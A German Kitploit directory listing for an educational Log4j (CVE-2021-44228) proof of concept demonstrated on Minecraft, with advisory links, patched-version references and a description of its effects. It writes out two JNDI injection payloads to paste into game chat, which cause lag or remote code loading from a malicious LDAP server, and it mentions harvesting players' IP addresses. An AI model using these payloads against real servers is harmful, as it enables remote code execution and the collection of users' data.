Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4j-PoC — Ein pädagogischer Proof of Concept für die Log4j-Schwachstelle (CVE-2021-44228) in Minecraft | Kitploit
Tools/GitHubGitHub/sma-das/log4j-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubsma-das/log4j-poc

Log4j-PoC

Ein pädagogischer Proof of Concept für die Log4j-Schwachstelle (CVE-2021-44228) in Minecraft

Repository anzeigen
3vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Proof of Concept für Log4j (CVE-2021-44228)

Haftungsausschluss

Dieses Projekt dient nur zu Bildungszwecken.


Einführung

Dies ist ein Proof of Concept der Log4j-RCE, adaptiert von HyCraftHD.

Hier sind einige Links für CVE-2021-44228:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

Dieser Fehler betrifft nahezu alle log4j2- und möglicherweise auch log4j1-Versionen. Die empfohlene Version ist 2.15.0, die den Exploit behebt.

Demonstration mit Minecraft (welches log4j2 verwendet)

  • Details zu den Auswirkungen auf Minecraft sind hier aufgeführt: https://twitter.com/slicedlime/status/1469150993527017483
  • Artikel von Minecraft ist hier: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • Behobene Minecraft Forge Versionen: https://twitter.com/gigaherz/status/1469331288368861195
  • Detaillierter Artikel von Minecraft Forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • Behobene Minecraft Fabric Versionen: https://twitter.com/slicedlime/status/1469192689904193537
  • Behobene Minecraft Paper Versionen: https://twitter.com/aurora_smiles_/status/1469205803232026625
  • Behobene Minecraft Spigot Versionen: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • Behobene Minecraft Sponge Versionen: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

Lag oder Senden serialisierter Daten

  • Füge ${jndi:ldap://127.0.0.1/e} in den Chat ein. Wenn ein offener Socket auf Port 389 vorhanden ist, versucht logj4 sich zu verbinden und blockiert die weitere Kommunikation, bis ein Timeout eintritt.
  • Bei Verwendung dieses Proof-of-Concept-Exploits protokolliert das Konsolenlog THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, ein serialisiertes String-Objekt vom LDAP-Server.

image

  • Zusätzlich empfängt der bösartige LDAP-Server jede IP-Adresse, bei der die Nachricht protokolliert wird. Das bedeutet, dass IP-Adressen von Spielern auf einem Server mit diesem Exploit gesammelt werden können.

RCE

  • Füge ${jndi:ldap://127.0.0.1/exe} in den Chat ein. Wenn -Dcom.sun.jndi.ldap.object.trustURLCodebase=true auf true gesetzt ist, wird die Remote Code Execution ausgelöst.

image

  • Glücklicherweise deaktivieren moderne JDKs das Remote Class Loading standardmäßig. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • Ältere Versionen erlauben dies möglicherweise noch!!
Tool herunterladen